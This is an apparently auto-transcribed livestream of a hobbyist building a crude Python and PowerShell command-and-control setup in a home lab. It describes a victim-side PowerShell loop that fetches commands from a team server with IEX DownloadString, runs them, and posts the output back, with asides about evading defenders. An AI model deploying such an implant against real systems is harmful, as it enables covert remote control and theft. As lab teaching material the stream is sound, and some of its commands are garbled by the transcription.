Oh, I gotta turn on camera. So my camera might go. I had two lights in my face and I can't see nothing. Trying to make it work. Okay, that's gonna be. Oh man, I should prepare more. Ooh, I can't lie. Kind of like yesterday, I was like, man, maybe if I turn this off. Yep, that did it. Yeah, something like that. The light refuses to stay up. All right, we good. All right, so today we're building a C2 in Python, or we're attempting to. I've never done this before. I do know the concept of what I want to do. Let me see what's going on. What's good, man? See you in here once again. What's good? So we're gonna start, man. So this Ubuntu is gonna be the team server. So when you have a C2, for those that don't know, you have obviously an attacker, and then you have something in the middle, and then you have the victim. The victim will be our Windows server here. And then our Kali obviously will be the attacker. So enough said, let's go. So the first thing that I want to do is exit that, clear, and then I'm gonna just start a new directory and call it CD maker. Call it let's make sure you can see that, because I don't know. Maker, just call it a C2, and then CD in there, and then clear, and then we'll call this one, I don't know what the actual terminology for, we'll just call it C2, vim C2. And so when you have, I'm gonna have to think a little bit, because I need something that's going to shoot commands to, what makes sense here? I need something that will shoot commands to a web server. So I probably don't even need a Python script. I just need to make post requests. So I probably need to focus on our middleman, actually. So this is the first thing we'll do. We'll focus on our middleman. What is the password to this thing? Boom, got it. Open up a terminal and then make that bigger. Yeah, but right now I have no idea what I'm doing, because I took a class, Ross the Mouse's class, and it was in .NET. And it was just going so fast. Maker C2. MC2. So essentially it should just be a Python server, a web server, but it has to accept post requests on both ends, and then it has to store those as like some kind of text object. So what we could do is we can go to Google. This is the same thing all software engineers do. Just go to Google, and then I want to see if I can find a Python web server. It's not what I want. Server started, serve forever. But let me see, Python web server accept post. Stack Overflow for the win, baby. See what they got. Serving import. This is personally Swift user need this kind of functionality. It's handle put requests. Put if OS path exists, self send response for. Now I don't need that. With open file name WB is output file, output write self above, self send, created, save. I think this is what we need. Sort of. So we're gonna do some code reuse here, and I don't want that to be like that. We're gonna see if this runs, and then based on what it looks like, we're gonna make some changes. I don't like that. I don't like this version of Vim. I hate this version. What? I hate this version. I don't know why it's just only green. Anyway, we're gonna keep going. So I got an HTTP server. I'm importing OS, importing logging. Don't really need that. Try import blah blah blah. Server accept import error. We can, but okay, we can do that. Simple HTTP server. Whatever. You don't need login. Save file following an HTTP request. We can have that. Don't overwrite files. We don't actually want that. We actually want to overwrite the file. File length, int self help, self whatever, that should fine. That should be fine. With open, that should be fine. Created. Reply body, save file name equals main server. So that should all work. But how do you? How does this? I don't see anything that will make this run. Let's see though. Python C2. Let's go. No module name HTTP server. It has try except. Oh, okay. And so if I were to send a post request to, what was the IP of this thing? I really should prepare before I do live streams. I never do. I always intend to just prepare and have everything written down so it's just smooth and I'm perfect. And then like I get in, I'm like, bro, just let's go, bro. Open terminal, IF config. One 192.168.1119. So I need to go back to Cali, and then I need to see how I can make a post request in curl. So So let's go to curl post request. I should know this. This is going in my commander tool actually once I figure this out. Just to see. Yeah, I don't care. I don't think my web server cares about any of that. It just wants to accept post requests. So curl x post request and then IP. So curl x post and then the IP HTTP 192.168.119. And then the content that we want to post, which would be, let's see, let's go back. I guess let me go back to my Ubuntu and see what I did with my script. Let's say thank you to that. And I didn't content length. Oh, okay. I didn't create any parameters to save to. What is that? Tripping. I'm tripping. All right, let's just try something. Let's go back to Orcali. And then we'll just say name equals who am I. Could not resolve host. What does that mean? What happened with this thing? Oh, for 8,000. Server does not support this operation. All right, let's go back to you. Unsupported method post. I beg to differ. I created you specifically for put. What? Okay. Put might be better anyway. Curl put request. Okay. Yeah, curl might be better. I mean, put might be better anyway. Curl x put and then D. Tripping. Oh, I closed it. Let's go back. So once we do this, let me get this out of the way so I can see my peoples. Once I do this, I can turn this curl thing into like a tool, kind of like we did with the RPC exec. So that's kind of the intent there. I'm just kind of getting the initial workings down. So let's, man, I need some caffeine. All right, so yes, we want to go back to our Ubuntu and then actually run this thing and then go to Cali. This is gonna get old switching from place to place. Empty reply from server. I don't care as long as it took my information. What do you mean? Blah, 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 blah. File length, return self-dig name lower, key, error, content length. What is that supposed to mean? Can we do like a what do you call those things? You can do a burp sweep in a minute. But let's see. I gotta figure out what's going on here. So EIC2 handle put requests. Let's go back to that article to see what was going on. So I'm gonna do that there. How to make a So I did that, but then it was like actually put. Okay, maybe we want to keep the logging in it. I don't know what logging does. I thought logging meant you're actually let's delete all of this and start again. I don't know what I thought logging meant, but maybe it's something dealing with something that I need. So we'll put that back in there. Start messing up people's code. Where are we at? 16 minutes? We don't have that much time. We don't have much time to like fool around and not do work here. So, all right, it's gonna mess up again. What do you mean? I don't want that in there anyway. Excuse me. All right, Kali Linux. Let's try again. Okay, still does not like how I'm doing that. Let's just do like where am I there? And then go back. All right, so let's see what's going on here. It says request self-handle one request, and then method, file length, key error, content length is all I'm getting. Maybe see, sometimes like you'll see something like, what are you doing here? Save a file following HTTP put requests. Let's look for other. No, I don't need SSL support. Let's try this one. This one seemed like it'll work. How about let's just delete this entire thing. Remove C2, VI C2, paste. I want to see what it does when it receives. I want the why does it keep doing that? Space Jam DVD, Space Jam DVD, Space Jam DVD, Space Jam DVD. What? We don't have Python 3, do we? Oh, we do. And that is my camera. It is finally out of batteries, as expected. So I'm gonna take it out really quick. So we should be good now. Yep, we should be good. All right, Python 3. What you mean, man? Oh, I think I know what the code meant to say. So it should have said from HTTP server. See, you sometimes you find typo in people's code, man. Typos in people's code. Maybe you want to tell me what port you serving on? So we'll add that. Print serving on port 8000. Because they were too lazy to do it, so we'll do it for them. And then now we'll go back to our Kali. And then we'll go back to post requests. Why, man? What am I doing? 8080 over here? No, I'm doing 8000. It must not be really serving on port. I think we could just do that, and then server does not support this operation. Let's see what we got over here. Unsupported method post. Let's try put. Let's try put. Does not support this operation. All right, we're just gonna do a get then. We're gonna work around it because my brain just does not want to. I think that's more fitting anyway. Who am I? Nothing matches the given URI. That's cool. So what we could do is and this is probably the most ridiculous workaround here because I don't want to figure out, my brain doesn't want to go into creating web service today. But what we could do is and then we can pipe the output of this. Yo, this is gonna be crazy. Into sed. And then do one of those, and then 192.168.1.108. I just want to test it out to make sure it works. Then when you send, where am I? Let's see what happens over here. It doesn't do what I want it to do. That is how you do set, right? Sed is test. Yep. That's how you do sed. So it didn't do it for me here, and I'm like, okay, well, let's try Trying to make this work, son. As quickly as possible. This is, I would not do a regular C2 like this. I would basically go ahead and try to, it still should work though. It's just not the best practice. You probably heard that before on this channel. It's still not gripping that out, and I guess that's not standard out there. So let's see. Let's go back here. I want to see what the code looks like in simple HTTP server, or maybe not. No, I don't want that. I don't want any of that. Whoa. Do get message, right, bytes, message. Let's try that. No, we already tried that. Or did we? Man, I'm learning. Nope. Get request received. Let's try this one. I wish I had time to go ahead and upgrade to remove C2, VM C2, and then we'll paste that one in there, and then we'll see how this one works. So from URL parse, why does that keep happening? Top. Uh-oh. And this is Python C2. Then we got a different port there. 80, what was it? 88? 88. Oh no. Get request received. What are we doing over here? What we doing? Getting money. Okay, that's perfect. I like it. So let's see if that is standard out. Hopefully it is. We'll say grep B. I think we could just do my. And if we do that again, where are we at? Cali. Request receive. Yes. It was standard out. Let's just double check that. Because I'm like mad paranoid. So what we could do, if you're not following what I'm about to do, is we can take that GET request that is being received to this middleman and make that the command. And then that command is going to just sit and wait. And our victim will it's early, bro. Man, my brain is like our victim will come and grab whatever command that is and just run it, and then it'll have to work back in reverse where that the output of that command goes back. So we have burned a lot of time figuring this part out. But trust me, this is really janky. This is really cheesy, and I mean, you could build something around this, but I recommend putting more time into it than I am. But this should show you how the basic functionality of what's going on. So you can put as many, if you want to build like a dope C2, you can put as many middlemen as you want between the victim and the attacker, which is what I recommend. So there's that too. Ooh, I gotta take the trash out because today is Wednesday and I don't want trash from like, man, I gotta do that. All right, so yep, let's go back here, and instead of Python C2 grep, instead of grep, we're going to do a T, and then we're gonna say instructions.text, and then when you send your who am I, why would that happen? Was it 8088? What? How did that come back? And then from Ubuntu, if we look at our cat instructions.text, we don't have anything. I thought we just verified that that was standard out. We just verified that. Just verified that. Let's try that again, because maybe you ain't hearing me. Wow. Why would... Okay, so that's not how that works, which is sad. So I'm gonna have to go into the actual C2 and write a function that saves to a file. So let's do head to get request receive. So I don't need that because that's what's going back to print parse queues. Do post get bin post request receive. Post requests work too, but I'm not gonna. All right. So I think what we could do is damn, I gotta look up, did I save it yesterday? Let's go back to our Cali and see so that was a tool we made with it was the xfill DNS xfill thing. DNS xfill, that's not it. Where is it? So I just need to get the syntax for creating files. So them, I always forget it. I'm not really a Python dude, man. I can't even lie. I can script something and I'll sit there and I'll mess with it until it finally works. But just being a scripter, I'm just not. I mean, being a programmer, I'm definitely not a coder. I'm more of a hacker, I would say. Because if I need it done, I'll just go ahead and wrap my mind around whatever I need to do, and I'm done. So I want to do file, open, file location, and then right. No, actually I want, yep, file open. I need to import what? Sys? I don't know, sys. Let's see. File equals, man, I just forgot it that quick. File equals open. Open instructions text. I think that is in quotes, and then we do the R or the W. I'm running out of time here. And then we do the R, oh, W right there. So let's just see if that works without giving us grief. T doesn't work, so you failed me, bro. So let's go to here. Say thank you to that. Oh, I didn't even get a response back, so it must have errored out. What? Oh, I didn't put it in quotes. Why would I not do that? Let's do single quotes just to be fancy. Let's just make a touch instructions.text because I don't know how that works there. And now let's run it. And then we will say, Kelly, will my request receive? Okay, so boom, that works. So now we could say, how do you write to the file though? So I gotta look that up. Python, write to file. Should be super simple for me, but you know how things are. File open. So we did that right. So what do you mean? There we go. File. There are two ways to write to a file. So file open. So you have your lines there. Write a string to a file. File one, write, and then that string. So, and then we gotta close it. So write and close is what we're looking at. File write, and then we'll do self path, and then we'll do file close. Let's pray this works. So again, this is the cheesiest C2 ever. It's mad cheesy. And then we'll close that, and then we'll cats instructions.text, and we got who am I? So that's good. All right, that's a very big milestone there. So what we need to do now is what? Vim C2. I want when how do you do that? I think I just do self path, and then I do like replace, and then it was a, what was it, a forward slash? Yeah, forward slash MC2. We want to replace that forward slash with nothing. Forward slash with nothing. And then we want to close that. And we're going to see if this works. So we're going to overwrite cat instructions.text because we only want one instruction in there, right? We don't want more than one instruction. So run that again. Python C2. And then Coral, who am I? And then if we look at cat instructions.text, we're good. We are good. So now that we have our victim putting the instructions on some people call them the team servers, some people call them middleman. I'm gonna call it the middleman because it makes more sense in my head, because it's like it's going to hold the instructions and it's going to hold the command output. So we can go ahead and start a Python server, but it's going to be on another port, CD and C2. By the way, if you do this in a modern organization, you're going to get caught. So don't do that. If you build off of what I'm doing, and just do your own thing, like do something different, or actually add stuff to this, you should be able to use it. So there's that. So I would definitely caution anyone about just taking what I'm doing in this video, because we're trying to compress it in 75 minutes. Don't take exactly what I do in this video and then try to use it. Take what I do in this video and build and improve upon that. Python m simple HTTP server, and we'll serve on like something like, I don't know, 4444. It's fine. So we are serving the instructions.text. So we're done with the attacker have at least the functionality. We're gonna go back and actually make a tool that makes sense to use instead of just curl. So we're gonna make a tool for the attacker, but for right now we just need the functionality to work. We're serving now. We're serving the instructions.text now. So what we need to do is go to our Windows web server, and we are going to have to make that bigger. So you don't need that. So we're gonna make that. That's as big as it goes. Wow. Okay. I hope you guys can see that. I'm gonna try to make sure I'm mindful of like people's eyes and stuff, because that's mad small. Can I do like that? Okay. I don't want 200 though. Hey, don't want 175. Yeah, and then I'm gonna just try to. Yeah, I got you. Don't even worry about it. You probably can't see it now. You're probably on the phone or something, but I got you. So you go here, like ISC, and then you will always want to run as administrator, although I think I already am. We're gonna make a simple, very simple and dirty PowerShell script to be our. Come on, bro, burning my time up. Where we at? We are at 43 minutes. So we have another something. I don't know how much more time we got. We said 75 minutes, so we got another 30. Yeah. So we should at least, at minimum, be able to make the functionality work. Don't try this at home, kids. All right. Let's bring that script down, and I'm gonna try to make sure you can see that. I know I'm blind. I normally wear glasses, but because the glare from there, I just don't bother with glasses, at least during live streams. Anyway, wow. We're gonna do wget HTTP 192.168.1.119. What do we 4444 / instructions.text. This should work. What? You don't want to work. Okay. That should work. Let's try again. Wow. Oh, it's getting it. There we go. So it got it, and then the content, who am I? So I think you know where we're going with this. I didn't know that was an object though. Okay, I can dig it. Makes it easier for me. So from here, what we want to do is, how do you make, I gotta look that up. But there's a way, I think it's just invoke expression actually. And I'm gonna get this from Callie actually, because I never remember. Remember I told you I never remember this. Commander IEX 192.168.1.119 and then 4444. And I'm supposed to do instructions.text. I didn't put the file in here. Why would I do that? Oh, I know what's going on. There we go. I just have to change. So I'm just gonna use this as a reference actually. So again, I never remember IEX. Let's try to make this screen like that and this screen like that. But confused myself. Hope you guys can see that. If you can't, drop something in the comments so I can know that you can't see that. So IEX new object net web client download string. Bro, this is not going well. HTTP 192.168.1.119. What? Okay, that's weird. It's not word wrapping like I would like it to. Live stream, bro. Don't try this at home. 119. What else? And then there's the port. So I got the hard part down, so I shouldn't even be like stressing anymore. So 119 is 4444/instructions.text, and then you just close that joint, and this should work. Fingers crossed. We got it. We got it to work. All right, so that is all this. That's all the victim is going to do. So what we could do now is say. Copy, and then we can say paste, and then this will be retrieve. Oh, I'm about to do what everybody else does. Intent to make the victim retrieve instructions from the, I'll just call it a team server for now. And so that's good. So we have basic functionality going from Callie all the way to the victim. So now this needs to happen in a loop. So while true, I think that's how you do that. Man, I just know too many languages, man. That's why I know I could never. And then you want it to sleep like. You want it to sleep. So sleep, we'll do 30 seconds or something. I don't know. I think that's 30 seconds. Okay. So it's going to continue to do that. We could save this so we don't lose our work. Save as. Whew. I told you it's gonna be like mad cheesy. C2. Is that 30 minutes or 30 seconds? That's. Oh, 30 seconds. All right, boom. We good with that. So now we need to make sure that this output gets back to the our Cali. So we'll stop that, and then we'll say that our IEX command needs to output to something else. No, it doesn't. What we could do is do a we can say output equals that, and then we could just do wget http 192.168.1.119, and this will be on the oh man, I'm about to really, all right, this is about to really get crazy, because we need 5555 and then slash output. I think that's just like curl. So yeah, I'm not like mad. I'm not super proud of my C2 here. And my Kali freezes up. Luckily, it's not serving anything, so we can deal with it restarting today. It's fine. Hello. What's good? I think you probably pronounced that Shadish. What's good, man? We're building the cheesiest C2 ever, and then we're going to make it pretty probably in the next video, but we just want to, I don't know, quit without saving, bro. Leave me alone. We want to make sure that it looks good so somebody will want to use it. So there's that. So we need to go back to our Ubuntu. So this is going to get confusing. So it's going to get confusing quick because I'm not really putting a lot of thought into the implementation. I just want it to work. We're gonna have to do another Python server. Actually, let's go and mc2 dot victim response or something like that. Nope, we need to copy this C2 into C2 victim response. So we need to do the exact same thing we did with the original C2. What? But instead of saving to instructions.txt, we'll save that to response.txt, and then yeah, that's literally it. This, and then we need our port to be 5555. So in our def run, oh yeah, man, I appreciate that. I can't. I'm just gonna tell the the viewers out there, like, it's like getting up every morning. Sometimes I just want to stay in bed, but I try to picture this YouTube channel as not belonging to me, but to you guys. Yeah, I appreciate that. So, part of what I do is study for myself as well. So since I already get up and study, I'm like, why not study in front of people? And then even when no one's here, at minimum, it's studying for myself. So, yeah, I appreciate that feedback there. But even if no one's watching, I hope people come back and watch the video that's saved after the fact. So there's that. So we're gonna keep going. Python C2 victim response. Why is that not auto completing? This is actually going pretty well, all things considered. Let's do this. Let's see if we get something to work for us. Let's go back to our Ubuntu. So we got our response back. So let us see if our response.text saved correctly. It did. Why do I have it? Oh, but I don't want to. Yeah, I don't. Oh yeah, because it's red down there because it is we don't want to replace slashes in this, so we won't do that. And then we can go back to Python C2 response. And so now we have a fully working, almost fully working C2 here, and we did it in what, like 7 minutes. But I think when we say C2s, when we talk about C2s, everybody thinks of like Cobalt Strike or something complicated. All that extra fancy stuff is not the C2 part. The C2 part is just the messaging, how the messaging goes. So just remember that when you talk about C2s or whatever the case. So we're gonna just let the client do its thing now, because that's how you would want your malware to work. Once you implant your agent on the victim, you just want it to run in a loop and continuously try to grab instructions. And so that's what we just did here, and that's what it's doing. So yeah, so now we'll go back to, what was it, curl? Who am I? Yep. I think we're done. Let's make the let's go into home Kali work lab. It's not mounted. What I would like is for like other YouTubers to do challenges like this. Like the bigger YouTubers, like challenge yourself, like how quickly, without notes, just Google how quickly can you make a C2. So like, if any of the big YouTubers out there are watching, I'm challenging like John Hammond, Network Chuck, Ipsec, all you guys to like get on these speed runs, because it's nervous and it's anxiety filled at first, but when you start getting rolling, it's like, man, this is working now. CD, C2. So yeah. Oh, what is that? That's my Python file, and I didn't give it a Python. Oh, what is that? No, that's the folder or the directory, right? What is that? Oh, I didn't put anything in here. This is just curl commands. Okay, so now we'll make our actual victim. We'll make our actual attacker interface here. So we'll just say vim C2 actually, and then I don't remember how to do Python input. I don't remember how to do bash input. So bash input, read input, user input, and then it just says read. Wouldn't have to do a while loop, so we'll say oh, shebang first. Shebang slash bin bash, and then we'll say wow. I think it's true. We went over this before. No, it's true. Damn it. While loop. Just Googling the most basic stuff, right? That doesn't help. That doesn't help. That doesn't help. None of this helps. I think I could just say wow 1 or something like that. Can I not? What do you think? Wow true dash. And this is like super bad practice. I would never make a while true in a serious script. Well, I have a couple times, but before I put it out to GitHub, definitely would want a better condition than just true. Or maybe I wouldn't. I don't know. We'll have to see. So while true do read. Damn it, that didn't work. While true do read. But how do you make like a actual input? I don't want it like that. I want it to be like a shell. In some respects. How do you do like a bash? If I Google bash shell, it's gonna give me something that I don't want. Man, I'm gonna have to do it. You know what? I got it in my notes somewhere, actually. That. Where are you? HTTP. Get out of my way. Where was that? Multimaster where I did it? Oh. That is a Python shell. So we're gonna switch to Python here because that is the only way that I know how to do it. Okay, we're gonna switch to Python. So I'm mad on Orthodox, but this is a speed run, so we're going to go back. How much time we got? We don't have that much time. We have like 13 minutes or something. Okay, input. Oh, we didn't want to do that. We want to do input equals, this is Python 3, so it's just input. And then we'll just do that. Strip, and then call that. And then we have to do while true Python. Then do that. And then you just say curl HTTP 92168.1.119. No, we need to do OS system and then quote that 92168.1.119, and then we need to say close that, and we need to do a plus, and then input, and then close that. Then we'll do, that's it. Bang slash bin bash. And then we'll run our C2, Python C2, and then we'll say something like, instead of who am I, we'll do PS. Oh, damn it. import OS. So how do we get, so this should work as far as getting, let's say, get process. String object is not callable. What does that mean? String object is not callable. What do you mean? Let's change the variable name on it, maybe. Uh-oh. Okay, so that works. So we did the wrong port here. So the port for our interface is 8088. So 8088. Somebody's probably saying something. Maybe, maybe not. Nope. 8088. Bang. Python C2, and then we'll just do get process. Connection still refused, but I'm pretty sure it's not. What? Let me see. Interrupt that. Not time. That's 5555. So that's the victim's interface. What is this? 4444 is what? I forgot. We only have two interfaces, right? Okay, I'm completely confused. I should have been taking some kind of notes because now I'm lost. So let's just see what we were doing here. Oh, okay, so 4444 is how the victim retrieves on 4444 and sends back on 5555. So to not go crazy here, I'm gonna open up another terminal and this is crazy. Go into Vim C2 because I need, so Callie needs a way to place instructions. Yeah. So instead of 88, I'm gonna do 3333. So 3333 to send the instruction, 4444 to retrieve the instruction, 5555 to send the instruction back, and then maybe a 6666 to retrieve it from as the attacker. Yeah, don't judge me, bro. So yeah, if you opened up all of these ports, somebody be like, bro, what is going on? Python, what was it? Python C2. All right, server running at localhost 3333. But yeah, I definitely should have like whiteboarded this or something. It's enough to make your head just. All right, so 3333 drops the instructions. Python C2. We'll just go get process this time. So it retrieved our get process. And so, can I name this? That would be dope if I could. Okay, just keep up with me. So this is me dropping the instruction. It says get process. What? Okay, so we received our response. Why would get process look like that? Just know that we've gotten a response, right? I don't know. So this is me dropping the instructions in there. This is our victim retrieving my instruction. This is the victim sending the response back. So all of this happens on team server. And then finally, we just need a way to get our responses. So we need, where we at? We got 5 minutes to complete this thing. C on Kali Lab, C2. Let's see, Vim, C2, and then we'll just do dot response. We gotta do a, nope. Actually, yep, let's just do Vim C2 dot response. And then we need to copy from one of, so these response dot text. I need to run one more web server on the team server. So we'll just do new terminal. Then we'll go into C2, I think. What was it? Yeah, C2. And then we'll say Python M simple HTTP server, and then 6666. What? Oh. And this is the way that the Kali will retrieve the instructions back. And so now all I have to do is just sit here on my Kali and watch my C2 work. So it'd be dope if you could get it right in this thing, but for now we're just going to ignore all of that, and then we're just going to say wow she bangs /bam bash, and we'll say wow true, I think do done, while true do, we just sleep like 30 seconds, kind of like the victim, and then we'll say while true do curl HTTP 192.168.1.119, and then we'll just do like 6666 response dot text, and then I think that's gonna be it. Actually, let's check it out. So Python. I didn't think you had to do a thing right there. Oh, because I'm going too fast. How many? We got 2 minutes. C2 response. Permission denied. Chmod 700. C2 response. What? 30? Sleep near 30? We're not gonna do this sleep. We'll do sleep later. Actually, that's probably a bad idea. How do you do a sleep in bash? That was just sleep. Oh, you don't do a thing there. Clear, and then you just do that, and boom. So that's how we would do it. That is our working C2. It's ugly, I know. That's because the PowerShell that I think you get it. So what? I don't know. So instead of get process, we could just do ipconfig. And then because, so with C2, you don't want an instant response with your C2. You want it to, what's the word I'm looking for? You want it to have some kind of delay so that you're more stealthy, or you have some kind of offset going on for yourself. So within a minute, we should get a response to our ipconfig. So if you like took this to work, like you'd be the man, like you'd be like, wow, ooh, that's ugly. But we have our IP config here. I don't understand. Maybe because it's going over as that's mad ugly though. I can't even hold you. Let's see what's going on here. Let's open up another new terminal. But we did it, so we completed the C2. As ugly as it is, we did it, man. Oh, let's see, cat response. And it is URL encoded. So what we could do, can you like decode before you do? Let's try to do that. How do you first? Let's see how you decode. But we have a working, it works, so we completed it. Let's see, decode URL and Python. URL lib. No, why is it unquote? Okay, so I'm just gonna take your word for it. Which one saves the response.txt? Okay, I just got like that gets response.txt. All right, let's just break our RC2 there. Then victim response. Ooh, I probably need to go ahead and from URL lib parse import from URL lib parse. URL lib parse lib.parse parse import on results and keep bang. Oh, why would I do that? I'm still not done. Go back into our article to see what we're doing. The function unquote URL decodes the URL string inside the variable. So we need to do unquote. Let's say clean equals unquote self path, and then we'll file write clean, and that should work. Really? URL lib parse. There's got to be some kind of URL lib parse URL lib. Let's make sure we're spelling everything correctly. All right, let's keep going. Decode URL. We just looked at that, right? Yep. So we don't want to look at that. Python 3. I don't care about Python 3. Yeah, there we go. Import URL lib. All right, I'm gonna put these notes over here, and it looks like I have no viewers. This is good stuff, so I'm gonna keep going. It would be a fun video to watch if I just got your message. It'd be a fun video if anyone took up like a speed run challenge, because I mean, if I were doing a video, I would have notes all the way, but like if you have to, like if you're forcing yourself to Google, like people would tune in. So I would definitely, I think. Bang, start over. URL parse, import unquotes. But yeah, this is my first. I've never built a C2 before. I did a class, but I never completed the C2, and it was in all .NET. So I was trying to do the C2 while I was learning, and it was a mess. So I never completed it. But I always understood the basic functionality of how I would want a C2. So I was like, well, why don't I just like speed run it and see what happens? So I'm pretty proud of myself here. MC2. I gotta get ready for work in a few minutes. So imports. No, we want import URL lib, and we got our string. So it wants it like clean equals URL lib unquote. I wish Python 2 and 3 weren't so different. All right, now this should work. We should get something within 30 seconds or a minute, maybe. I don't know. It should be prettier than this. Way prettier. I think next, okay, yep, there we go. So it's URL decoded. So we have a working C2, and it's a little bit more tolerable, but as you see, like it's not parsing the new lines correctly, but you can, I don't know, if you're a hacker, you figure it out, right? You just go through and understand it. So our victim is 192.168.176. So we go back here and we're like, all right, let me see what is in the victims. GCI. Nope, actually we want to type C. You're gonna love this. C2C users administrator desktop root.txt. Now I don't know how the URL is gonna treat the my C2 is gonna treat these characters. C users administrator desktop root.txt. Yep, that sucks. URL using bad illegal format or missing URL. That sucks. So, how will we do that? How will we read? I don't know how we would do that actually. How do we read a file? Because we wouldn't. Let's try like this then. Let's say type C users administrator desktop root.txt. Yeah, so it's because that's going into an actual URL to be sent, and it's like, bro, no, you're not about to do all of that. So you got to keep it. I guess you got to keep it simple here, and just run like single word commands for now. So we could see stuff like, we did IP config, we did who am I. What else can we do that's interesting? It wouldn't. So we would have to also handle spaces. So it'd have to be like stuff like get something, get service. I don't know. We'll end it with that. We'll end it with get service. And then if I got any questions on the back end, just let me know in the comments. But we did it. We're just gonna wait though. See what response we get. Now, while we wait, I'll tell you, like, just to reiterate, or just to kind of like let you know, if the blue team sees this, it did another IP config, so we gotta wait 30 more seconds. If the blue team sees this, yeah, it did. You ain't called. So you want to encode this some kind of way and then decode it on your end. We didn't do any of that. We just wanted a working C2. So there's that. We're gonna wait to see if we can get our get service, and we're gonna kill the live stream. Yee! Oh, it still didn't work. I don't understand what's going on. It said get request received. Let's go to our team server. Make sure everything's running. Get service was retrieved. That's working. So our go back and see if it's working still. No, it's still not working. I don't know. It just was working when I ran the IP config. Maybe I crashed something. Get response. I don't remember. I think I set everything back up. 623. There's get service. Get service made it. Yeah, I'm not sure. Maybe I screwed something up when I messed up with the response. I hope nothing's crashed over here. Let's make sure that we're not crashed here. No, we're not crashed. Oh. Okay, yeah, something did happen here. Get content. I never did a get content. I did a get service. Okay, so apparently, like, there's things that I have to work on here, but I just want to see it work one more time. So let's just do a who am I, just to keep it easy. But with all those weird characters, you got to do like stuff, right? So the who am I made it. So we should have administrator back on our Kali now, and then we'll end the live stream. In a few seconds, actually. Yep, there's administrator. So I hope you enjoyed it. Again, this is mad cheesy. So don't try this at home. You know, do your thing. Make sure that you're good here. This is Dan Main. I really enjoyed this. I didn't think I would like this. I thought that this would be super terrible, but I ended up having a lot of fun. If you enjoyed the video or learned anything, consider subscribing, liking the channel, and donating to the Patreon. And yep, trying to be super humble. So yeah, do that for your boy. We out. Have a good day. And we'll be live streaming tomorrow. Depending on the feedback we get, maybe we improve this to make it prettier, or maybe we do something else. I don't know. See you. Peace. Like how you end stream.